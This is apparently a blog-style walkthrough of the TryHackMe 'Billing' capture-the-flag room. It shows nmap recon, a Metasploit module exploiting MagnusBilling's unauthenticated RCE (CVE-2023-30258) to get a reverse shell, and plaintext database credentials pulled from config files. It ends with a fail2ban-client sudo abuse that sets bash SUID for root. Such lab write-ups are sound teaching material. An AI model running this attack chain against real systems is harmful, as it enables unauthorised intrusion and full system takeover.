Today, we're setting sail into the Billing room on TryHackMe, where our mission is to navigate through vulnerabilities, uncover flags and claim root access! 💀⚔️
Reconnaissance - Scouting the Enemy 🚀
Every great conquest starts with intelligence gathering. A thorough network scan helps identify open services and potential entry points.
I use Nmap for this task:
r1pp3r 🔱 god2eye ~/Documents/tryhackme/billing
λ nmap -sC -sV 10.10.137.233 | tee nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-17 12:52 IST
Nmap scan report for 10.10.137.233
Host is up (0.35s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 79:ba:5d:23:35:b2:f0:25:d7:53:5e:c5:b9:af:c0:cc (RSA)
| 256 4e:c3:34:af:00:b7:35:bc:9f:f5:b0:d2:aa:35:ae:34 (ECDSA)
|_ 256 26:aa:17:e0:c8:2a:c9:d9:98:17:e4:8f:87:73:78:4d (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
| http-title: MagnusBilling
|_Requested resource was http://10.10.137.233/mbilling/
|_http-server-header: Apache/2.4.56 (Debian)
| http-robots.txt: 1 disallowed entry
|_/mbilling/
3306/tcp open mysql MariaDB (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.45 seconds
🕵️ Findings :
22/tcp - OpenSSH 8.4p1 (Debian)
80/tcp - Apache 2.4.56 hosting a web application (/mbilling/)
The presence of /mbilling/ suggests the system is running MagnusBilling, a widely used VoIP billing platform. This discovery guides our next steps towards web exploitation.
Initial Access - Breaking In! 🏴☠
Exploiting MagnusBilling (CVE-2023-30258)
Time to fire up Metasploit 🔥
msfconsole
search magnusbilling
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
set RHOSTS <machine_ip>
set LHOST <attacker_ip>
set LPORT 6969
exploit
🎯 Boom! We're in!
Successfully executed RCE 🎉, gaining a meterpreter shell 💻
Let’s stabilize our foothold and get comfy:
meterpreter > shell
which python3
/usr/bin/python3
python3 -c "import pty;pty.spawn('/bin/bash')"
asterisk@Billing:/var/www/html/mbilling/lib/icepay$ cd /home/magnus
asterisk@Billing:/home/magnus$ cat user.txt
cat user.txt
[REDACTED]
With access as magnus, we begin system enumeration and credential discovery.
Retrieving the user flag! Yo-ho-ho!, Let’s press on. 🏴☠️
Privilege Escalation - Climbing the Ladder 🏆
Hunting for Credentials and Misconfigurations
A deep dive into configuration files often yields useful information. Looking into key application settings, we find potential credentials:
cd /var/www/html/mbilling/protected/config
cat main.php
Additionally, another configuration file linked to Asterisk contains database credentials:
cat /etc/asterisk/res_config_mysql.conf
Extracted credentials—💰 Jackpot!
dbuser = mbillingUser
dbpass = BLOGYwvtJkI7uaX5
Sadly, no instant root access. I continued exploring for privilege escalation paths—our journey is far from over! 🔥
Checking sudo privileges:
asterisk@Billing:/home$ sudo -l
sudo -l
Matching Defaults entries for asterisk on Billing:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for asterisk:
Defaults!/usr/bin/fail2ban-client !requiretty
User asterisk may run the following commands on Billing:
(ALL) NOPASSWD: /usr/bin/fail2ban-client
Observation:
🎯 Bingo! The asterisk user can execute /usr/bin/fail2ban-client as rootwithout a password.
By modifying fail2ban’s SSH action, we introduce a SUID backdoor:
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client status
sudo /usr/bin/fail2ban-client status
Status
|- Number of jail: 8
`- Jail list: ast-cli-attck, ast-hgc-200, asterisk-iptables, asterisk-manager, ip-blacklist, mbilling_ddos, mbilling_login, sshd
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban 'chmod +s /bin/bash'
<n iptables-multiport actionban 'chmod +s /bin/bash'
chmod +s /bin/bash
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client get sshd action iptables-multiport actionban
<client get sshd action iptables-multiport actionban
chmod +s /bin/bash
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client set sshd banip 1.2.3.4
sudo /usr/bin/fail2ban-client set sshd banip 1.2.3.4
1
Verifying changes:
asterisk@Billing:/home$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-sr-x 1 root root 1234376 Mar 27 2022 /bin/bash
Executing /bin/bash -p now elevates us to root. 🚀 Now, let’s take the throne!
This exercise highlights the real-world attack chain used to compromise a vulnerable system.
Final words? Stay sharp, keep hacking, and always test your defenses! ⚔️🔥
Happy hacking, fellow pirates! 🏴☠️💻
A quick OSINT search reveals that MagnusBilling has an Unauthenticated Remote Command Execution (RCE) vulnerability . Leveraging this flaw provides us with an entry point into the system.
